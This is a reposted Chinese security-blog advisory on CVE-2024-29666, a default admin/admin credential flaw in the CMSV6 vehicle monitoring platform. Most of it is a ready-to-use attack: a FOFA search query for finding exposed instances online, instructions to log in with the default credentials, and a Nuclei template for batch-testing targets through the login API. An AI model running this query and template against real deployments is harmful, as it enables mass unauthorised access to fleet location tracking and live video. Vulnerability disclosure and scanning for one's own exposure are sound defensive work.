CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

admin
admin
admin
102642
文章
87
评论
2024年4月9日16:10:01评论21 views字数 825阅读2分45秒阅读模式

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

SPRING HAS ARRIVED

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

漏洞简介

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。

SPRING HAS ARRIVED

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

漏洞复现

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

步骤一:使用以下语法搜索资产并确定测试目标...

# 搜索语法body="/808gps/"

步骤二:直接使用admin/admin进行登录...成功如下....

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

SPRING HAS ARRIVED

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

批量脚本

CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞
id: CVE-2024-29666info:  name: CMSV6车辆监控平台系统中存在弱密码漏洞  author: ly  severity: high  description: CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。用户名:admin 密码:admin  tags: cve-2024,cve  metadata:    max-request: 1    fofa-query: body="/808gps/"    verified: truehttp:  - method: GET    path:      - "{{BaseURL}}/StandardApiAction_login.action?account=admin&password=admin"    headers:      Accept-Encoding: gzip, deflate      Accept-Language: en    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'admin')"

原文始发于微信公众号(揽月安全团队):CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月9日16:10:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29666:CMSV6车辆监控平台系统中存在弱密码漏洞https://cn-sec.com/archives/2640128.html

发表评论

匿名网友 填写信息